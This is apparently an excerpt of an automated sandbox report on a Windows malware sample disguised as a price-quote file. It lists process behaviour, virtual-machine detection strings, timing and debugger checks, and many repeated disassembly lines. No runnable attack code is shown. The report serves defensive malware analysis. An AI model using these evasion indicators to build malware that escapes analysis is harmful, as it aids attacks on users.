Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	API coverage: 0.6 %
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	API coverage: 1.2 %
Source: C:\Windows\SysWOW64\cmstp.exe	API coverage: 1.8 %

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Thread delayed: delay time: 35529	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Thread delayed: delay time: 35529	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
Source: ySqETqNvdTbE.exe, 0000000B.00000002.1552618374.0000000001032000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000002.3901573939.000000000888E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: explorer.exe, 00000010.00000003.2291407142.0000000008979000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00`
Source: explorer.exe, 00000010.00000003.3081820013.00000000087E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000010.00000003.3081820013.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008796000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: explorer.exe, 00000010.00000003.2291641463.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3084418132.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3084418132.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@g6O
Source: explorer.exe, 00000010.00000002.3880153485.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
Source: explorer.exe, 00000010.00000003.3081820013.00000000087E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
Source: explorer.exe, 00000010.00000003.3082812044.00000000088F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000010.00000003.3082812044.00000000088F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
Source: explorer.exe, 00000010.00000002.3880153485.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000010.00000003.3082812044.00000000088F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000003.3082812044.00000000088F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000010.00000002.3880153485.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Code function: 10_2_00409AA0 rdtsc

10_2_00409AA0

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFC188 mov eax, dword ptr fs:[00000030h]	10_2_01AFC188
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFC188 mov eax, dword ptr fs:[00000030h]	10_2_01AFC188
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A80185 mov eax, dword ptr fs:[00000030h]	10_2_01A80185
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE4180 mov eax, dword ptr fs:[00000030h]	10_2_01AE4180
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE4180 mov eax, dword ptr fs:[00000030h]	10_2_01AE4180
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC019F mov eax, dword ptr fs:[00000030h]	10_2_01AC019F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC019F mov eax, dword ptr fs:[00000030h]	10_2_01AC019F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC019F mov eax, dword ptr fs:[00000030h]	10_2_01AC019F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC019F mov eax, dword ptr fs:[00000030h]	10_2_01AC019F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3A197 mov eax, dword ptr fs:[00000030h]	10_2_01A3A197
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3A197 mov eax, dword ptr fs:[00000030h]	10_2_01A3A197
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3A197 mov eax, dword ptr fs:[00000030h]	10_2_01A3A197
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B161E5 mov eax, dword ptr fs:[00000030h]	10_2_01B161E5
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A701F8 mov eax, dword ptr fs:[00000030h]	10_2_01A701F8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B061C3 mov eax, dword ptr fs:[00000030h]	10_2_01B061C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B061C3 mov eax, dword ptr fs:[00000030h]	10_2_01B061C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	10_2_01ABE1D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	10_2_01ABE1D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE1D0 mov ecx, dword ptr fs:[00000030h]	10_2_01ABE1D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	10_2_01ABE1D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	10_2_01ABE1D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A70124 mov eax, dword ptr fs:[00000030h]	10_2_01A70124
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov eax, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov eax, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov eax, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov eax, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov eax, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov eax, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	10_2_01AEE10E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B00115 mov eax, dword ptr fs:[00000030h]	10_2_01B00115
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEA118 mov ecx, dword ptr fs:[00000030h]	10_2_01AEA118
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEA118 mov eax, dword ptr fs:[00000030h]	10_2_01AEA118
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEA118 mov eax, dword ptr fs:[00000030h]	10_2_01AEA118
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEA118 mov eax, dword ptr fs:[00000030h]	10_2_01AEA118
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14164 mov eax, dword ptr fs:[00000030h]	10_2_01B14164
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14164 mov eax, dword ptr fs:[00000030h]	10_2_01B14164
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD4144 mov eax, dword ptr fs:[00000030h]	10_2_01AD4144
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD4144 mov eax, dword ptr fs:[00000030h]	10_2_01AD4144
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD4144 mov ecx, dword ptr fs:[00000030h]	10_2_01AD4144
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD4144 mov eax, dword ptr fs:[00000030h]	10_2_01AD4144
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD4144 mov eax, dword ptr fs:[00000030h]	10_2_01AD4144
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A46154 mov eax, dword ptr fs:[00000030h]	10_2_01A46154
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A46154 mov eax, dword ptr fs:[00000030h]	10_2_01A46154
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3C156 mov eax, dword ptr fs:[00000030h]	10_2_01A3C156
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD8158 mov eax, dword ptr fs:[00000030h]	10_2_01AD8158
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A380A0 mov eax, dword ptr fs:[00000030h]	10_2_01A380A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD80A8 mov eax, dword ptr fs:[00000030h]	10_2_01AD80A8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B060B8 mov eax, dword ptr fs:[00000030h]	10_2_01B060B8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B060B8 mov ecx, dword ptr fs:[00000030h]	10_2_01B060B8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4208A mov eax, dword ptr fs:[00000030h]	10_2_01A4208A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3A0E3 mov ecx, dword ptr fs:[00000030h]	10_2_01A3A0E3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC60E0 mov eax, dword ptr fs:[00000030h]	10_2_01AC60E0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A480E9 mov eax, dword ptr fs:[00000030h]	10_2_01A480E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3C0F0 mov eax, dword ptr fs:[00000030h]	10_2_01A3C0F0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A820F0 mov ecx, dword ptr fs:[00000030h]	10_2_01A820F0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC20DE mov eax, dword ptr fs:[00000030h]	10_2_01AC20DE
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3A020 mov eax, dword ptr fs:[00000030h]	10_2_01A3A020
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3C020 mov eax, dword ptr fs:[00000030h]	10_2_01A3C020
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD6030 mov eax, dword ptr fs:[00000030h]	10_2_01AD6030
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC4000 mov ecx, dword ptr fs:[00000030h]	10_2_01AC4000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000 mov eax, dword ptr fs:[00000030h]	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000 mov eax, dword ptr fs:[00000030h]	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000 mov eax, dword ptr fs:[00000030h]	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000 mov eax, dword ptr fs:[00000030h]	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000 mov eax, dword ptr fs:[00000030h]	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000 mov eax, dword ptr fs:[00000030h]	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000 mov eax, dword ptr fs:[00000030h]	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000 mov eax, dword ptr fs:[00000030h]	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E016 mov eax, dword ptr fs:[00000030h]	10_2_01A5E016
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E016 mov eax, dword ptr fs:[00000030h]	10_2_01A5E016
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E016 mov eax, dword ptr fs:[00000030h]	10_2_01A5E016
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E016 mov eax, dword ptr fs:[00000030h]	10_2_01A5E016
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6C073 mov eax, dword ptr fs:[00000030h]	10_2_01A6C073
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A42050 mov eax, dword ptr fs:[00000030h]	10_2_01A42050
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC6050 mov eax, dword ptr fs:[00000030h]	10_2_01AC6050
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6438F mov eax, dword ptr fs:[00000030h]	10_2_01A6438F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6438F mov eax, dword ptr fs:[00000030h]	10_2_01A6438F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3E388 mov eax, dword ptr fs:[00000030h]	10_2_01A3E388
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3E388 mov eax, dword ptr fs:[00000030h]	10_2_01A3E388
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3E388 mov eax, dword ptr fs:[00000030h]	10_2_01A3E388
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A38397 mov eax, dword ptr fs:[00000030h]	10_2_01A38397
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A38397 mov eax, dword ptr fs:[00000030h]	10_2_01A38397
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A38397 mov eax, dword ptr fs:[00000030h]	10_2_01A38397
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]	10_2_01A503E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]	10_2_01A503E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]	10_2_01A503E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]	10_2_01A503E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]	10_2_01A503E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]	10_2_01A503E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]	10_2_01A503E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]	10_2_01A503E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E3F0 mov eax, dword ptr fs:[00000030h]	10_2_01A5E3F0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E3F0 mov eax, dword ptr fs:[00000030h]	10_2_01A5E3F0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E3F0 mov eax, dword ptr fs:[00000030h]	10_2_01A5E3F0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A763FF mov eax, dword ptr fs:[00000030h]	10_2_01A763FF
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFC3CD mov eax, dword ptr fs:[00000030h]	10_2_01AFC3CD
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A3C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A3C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A3C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A3C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A3C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A3C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A483C0 mov eax, dword ptr fs:[00000030h]	10_2_01A483C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A483C0 mov eax, dword ptr fs:[00000030h]	10_2_01A483C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A483C0 mov eax, dword ptr fs:[00000030h]	10_2_01A483C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A483C0 mov eax, dword ptr fs:[00000030h]	10_2_01A483C0
